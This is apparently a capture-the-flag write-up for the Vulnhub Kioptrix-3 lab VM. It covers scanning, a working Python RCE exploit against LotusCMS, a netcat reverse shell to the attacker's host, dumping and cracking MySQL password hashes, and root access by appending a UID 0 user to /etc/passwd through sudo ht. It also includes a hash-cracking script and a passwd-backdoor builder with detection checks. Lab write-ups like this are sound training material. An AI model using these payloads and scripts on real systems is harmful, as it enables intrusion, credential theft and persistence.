Welcome to the Kioptrix-3 writeup from Vulnhub
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k


Kioptrix-3

tags: Vulnhub Easy Linux OSCP
Platform: Vulnhub
Difficulty: Easy
OS: Linux

On the box's Vulnhub page we find this recommendation (the site links to itself by name, so without the hosts entry some links and the gallery will not resolve):
Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com

Kioptrix: Level 1.2 (#3)

Enumeration

Nmap

To get started, we run a quick scan of all TCP ports (-p-), skipping host discovery with -Pn since we already know the host is up.

$ nmap -Pn -T4 -p- 172.20.10.8
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 08:52 CEST
Nmap scan report for 172.20.10.8
Host is up (0.00041s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)

Nmap done: 1 IP address (1 host up) scanned in 5.04 seconds

Now that we know the open ports, let's scan them in depth.

$ nmap -A -Pn -p 22,80 172.20.10.8
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-01 08:53 CEST
Nmap scan report for 172.20.10.8
Host is up (0.00049s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: E8:2A:EA:D1:82:F6 (Intel Corporate)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.49 ms 172.20.10.8

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds

Port 80

Browsing the website on port 80, we find a small blog whose first post, New Gallery Online!, announces a photo gallery at http://kioptrix3.com/gallery.

Looking at the page source, we find a commented-out admin login link:

<!--  <a href="gadmin">Admin</a>&nbsp;&nbsp; -->

Lotus CMS

Searching for Lotus CMS vulnerabilities, we can find an RCE in this link, but I have only gotten the test injection to work.

Exploitation

Therefore, based on the repository exploit, we can write six very simple lines to get an RCE to play with. The page parameter ends up inside a PHP eval(), so the payload closes the string and the call around it, executes our PHP through the ${...} construct, and comments out the rest of the line with #.

import requests, sys, urllib.parse

# usage: python3 rce.py <host> "<php code>"   e.g. python3 rce.py 172.20.10.8 "system('id')"
s = requests.session()
# Close the string and the call LotusCMS builds around the page parameter,
# run our PHP via ${...}, then comment out whatever follows with #.
payload = "');${"+sys.argv[2]+"};#"
# Fetch the clean page once so it can be stripped from the injected response,
# leaving only the output of our command.
template = s.get('http://'+sys.argv[1]+'/index.php?page=index').text
r = s.get('http://'+sys.argv[1]+'/index.php?page=index'+urllib.parse.quote_plus(payload))
print(r.text.replace(template, '').strip())

Let's try it!

$ python3 rce.py 172.20.10.8 "system('id')"
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Great! Let's see if we can get a shell...

Start a listener in another terminal first, then fire the RCE with a reverse shell (this box's nc supports -e; the Python call will hang while the shell is connected):

$ nc -lnvp 8787
listening on [any] 8787 ...

$ python3 rce.py 172.20.10.8 "system('nc -e /bin/bash 172.20.10.4 8787')"

The listener receives the connection, and we upgrade the raw shell to a pty so that interactive programs such as su or ht work later on:

connect to [172.20.10.4] from (UNKNOWN) [172.20.10.8] 60573
python -c "import pty; pty.spawn('/bin/bash')"
www-data@Kioptrix3:/home/www/kioptrix3.com$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Post exploitation

Privilege escalation: www-data to loneferret

Enumeration

In the gallery's configuration file, /home/www/kioptrix3.com/gallery/gconfig.php, we find the MySQL root credentials in clear text:

$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

MySQL

www-data@Kioptrix3:/home/www/kioptrix3.com/gallery$ mysql -u root -p'fuckeyou'
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| gallery            | 
| mysql              | 
+--------------------+
3 rows in set (0.00 sec)

mysql> use gallery;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+----------------------+
| Tables_in_gallery    |
+----------------------+
| dev_accounts         | 
| gallarific_comments  | 
| gallarific_galleries | 
| gallarific_photos    | 
| gallarific_settings  | 
| gallarific_stats     | 
| gallarific_users     | 
+----------------------+
7 rows in set (0.00 sec)

mysql> select * from gallarific_users;
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
| userid | username | password | usertype  | firstname | lastname | email | datejoined | website | issuperuser | photo | joincode |
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
|      1 | admin    | n0t7t1k4 | superuser | Super     | User     |       | 1302628616 |         |           1 |       |          | 
+--------+----------+----------+-----------+-----------+----------+-------+------------+---------+-------------+-------+----------+
1 row in set (0.01 sec)

mysql> select * from dev_accounts;
+----+------------+----------------------------------+
| id | username   | password                         |
+----+------------+----------------------------------+
|  1 | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 | 
|  2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e | 
+----+------------+----------------------------------+
2 rows in set (0.00 sec)

Now we have the gallery admin credentials in clear text, plus the dreg and loneferret passwords stored as unsalted MD5 hashes. Let's see if we can recover the real passwords.
Using the website CrackStation we get both passwords in plain text. With loneferret's password in hand, we switch to that account from our shell with su loneferret and continue from there.
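The reason a lookup site resolves these hashes instantly is that the table stores bare, unsalted MD5: the same password always yields the same digest, so digests can be precomputed or brute-forced once for every account at the same time. The script below is an added example for this writeup, not code from the original page or from the Gallarific application. It parses a mysql-client style table dump and runs a dictionary attack against it, then shows the salted, slow KDF the application should have used instead. The table rows, the hashes (md5 of "password", "123456" and "admin") and the wordlist are constructed samples, not the dev_accounts rows from the box.

```python
import hashlib
from collections import defaultdict

# Constructed sample in the layout the mysql client prints; NOT the real
# dev_accounts table from the box.
SAMPLE_DUMP = """\
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | alice    | 5f4dcc3b5aa765d61d8327deb882cf99 |
|  2 | bob      | e10adc3949ba59abbe56e057f20f883e |
|  3 | carol    | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
"""

# Constructed wordlist for the demonstration.
WORDLIST = ["letmein", "password", "admin", "123456", "qwerty", "starship"]


def parse_mysql_table(dump: str) -> list[dict[str, str]]:
    """Turn the ASCII table printed by the mysql client into a list of
    {column: value} rows. Border lines (+----+) are skipped and the first
    '|' line is taken as the header."""
    header, rows = None, []
    for line in dump.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if header is None:
            header = cells
        else:
            rows.append(dict(zip(header, cells)))
    return rows


def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode()).hexdigest()


def crack_md5(targets: dict[str, str], wordlist: list[str]) -> dict[str, str]:
    """Dictionary attack on unsalted MD5. Each candidate is hashed once and
    looked up against every target digest, so the cost grows with the
    wordlist, not with the number of accounts (the property a per-user salt
    takes away). Returns {username: password} for the accounts recovered."""
    by_hash: dict[str, list[str]] = defaultdict(list)
    for user, digest in targets.items():
        by_hash[digest.lower()].append(user)
    found: dict[str, str] = {}
    for word in wordlist:
        for user in by_hash.get(md5_hex(word), []):
            found[user] = word
        if len(found) == len(targets):
            break
    return found


def salted_hash(password: str, salt: bytes) -> str:
    """What the application should have stored: a slow, salted KDF. The same
    password gives a different digest per user, so a precomputed lookup table
    is useless and each guess costs 100k iterations instead of one MD5."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000).hex()


if __name__ == "__main__":
    rows = parse_mysql_table(SAMPLE_DUMP)
    targets = {r["username"]: r["password"] for r in rows}
    for user, pw in crack_md5(targets, WORDLIST).items():
        print(f"{user}: {pw}")
    # Same password, two salts, two different digests.
    print(salted_hash("password", b"salt-a") != salted_hash("password", b"salt-b"))
```

Paste a real dump in place of SAMPLE_DUMP and point WORDLIST at a file such as rockyou to reuse it on an engagement; the parser only relies on the column header line, so any SELECT output with a username and password column works.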

Post exploitation

Privilege escalation: loneferret to root

Enumeration

Sudo

loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery/photos$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht

ht is the HT Editor, a hex/text editor. Because sudo lets us run it as root without a password, we can read and write any file on the system, which opens several routes to root (editing /etc/sudoers, /etc/shadow or /etc/passwd, for instance). Note that the !/usr/bin/su entry only denies su; it does nothing to restrict ht. If ht refuses to start in the reverse shell with an error about the terminal, set TERM first (export TERM=xterm).
We are going to inject a user with root permissions (UID 0) into the /etc/passwd file.

Exploitation

loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery/photos$ sudo /usr/local/bin/ht

To open the menu, we press Alt+F and choose Open.

Then we type the path of the file to edit, /etc/passwd.

Once the file is open, we add the line with our user at the end (name, a crypt(3) password hash, UID 0, GID 0, home /root and a shell).

We press Alt+F again and select Save.

Finally, we press Alt+F once more and choose Quit.

Now we should be able to authenticate as the injected user and be root!

loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery/photos$ su x4v1l0k
Password: 
root@Kioptrix3:/home/www/kioptrix3.com/gallery/photos# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:/home/www/kioptrix3.com/gallery/photos#
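The line pasted into ht is an ordinary passwd(5) record whose second field carries the password hash directly, so login never needs a matching /etc/shadow entry. The script below is an added example for this writeup, not code from the original page or from the ht editor: it builds that record for a chosen name and hash, and then runs the checks a defender (or you, cleaning up after the engagement) would run over /etc/passwd to spot exactly this kind of backdoor. The user name x4v1l0k, the hash placeholder and the SAMPLE_PASSWD content are constructed; the placeholder is not the digest of any real password, and a real one would come from a tool such as openssl passwd -1.

```python
import re
from dataclasses import dataclass

PASSWD_FIELDS = 7
# "x" means "look in /etc/shadow"; the others mark a locked account.
LOCKED_MARKERS = {"x", "*", "!", "!!"}


@dataclass
class PasswdEntry:
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def make_root_entry(name: str, pw_hash: str) -> str:
    """Build the passwd(5) line to append through the root-run editor.

    The second field holds a crypt(3) hash (e.g. the output of
    `openssl passwd -1`), so su/login never consult /etc/shadow for this
    account. An empty second field would mean no password at all."""
    if not re.fullmatch(r"[a-z_][a-z0-9_-]*", name):
        raise ValueError(f"unsafe user name: {name!r}")
    if ":" in pw_hash or "\n" in pw_hash:
        raise ValueError("hash must not contain ':' or a newline")
    return f"{name}:{pw_hash}:0:0:{name}:/root:/bin/bash"


def parse_passwd(text: str) -> list[PasswdEntry]:
    """Parse passwd(5) text; raises on a line with the wrong field count."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != PASSWD_FIELDS:
            raise ValueError(f"line {lineno}: expected {PASSWD_FIELDS} fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def find_rogue_entries(text: str) -> list[str]:
    """Checks a defender runs over /etc/passwd: extra UID 0 accounts,
    passwordless accounts, and hashes kept in passwd instead of shadow."""
    findings = []
    for e in parse_passwd(text):
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: UID 0 account that is not root")
        if e.passwd == "":
            findings.append(f"{e.name}: empty password field, no password required")
        elif e.passwd not in LOCKED_MARKERS:
            findings.append(f"{e.name}: password hash stored in /etc/passwd instead of /etc/shadow")
    return findings


# Constructed sample of a clean file; not the box's real /etc/passwd.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
"""

# Placeholder shaped like an MD5-crypt hash; swap in real `openssl passwd -1` output.
PLACEHOLDER_HASH = "$1$xyz$0123456789abcdefghijkl"


if __name__ == "__main__":
    backdoored = SAMPLE_PASSWD + make_root_entry("x4v1l0k", PLACEHOLDER_HASH) + "\n"
    print(backdoored.splitlines()[-1])          # the line to paste into ht
    for finding in find_rogue_entries(backdoored):
        print("FINDING:", finding)
```

On the defensive side the same checks are a one-liner away (awk -F: '$3 == 0' /etc/passwd), but the parser above also catches the passwordless and hash-in-passwd variants of the trick, which a UID-only check misses.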

And, as we can see, this box in the series does come with a flag:

root@Kioptrix3:/home/www/kioptrix3.com/gallery/photos# cd /root
root@Kioptrix3:~# ls
Congrats.txt  ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone. 
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.

I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com

Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS: 
http://www.lotuscms.org

Gallery application: 
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/

Also, all pictures were taken from Google Images, so being part of the
public domain I used them.

root@Kioptrix3:~#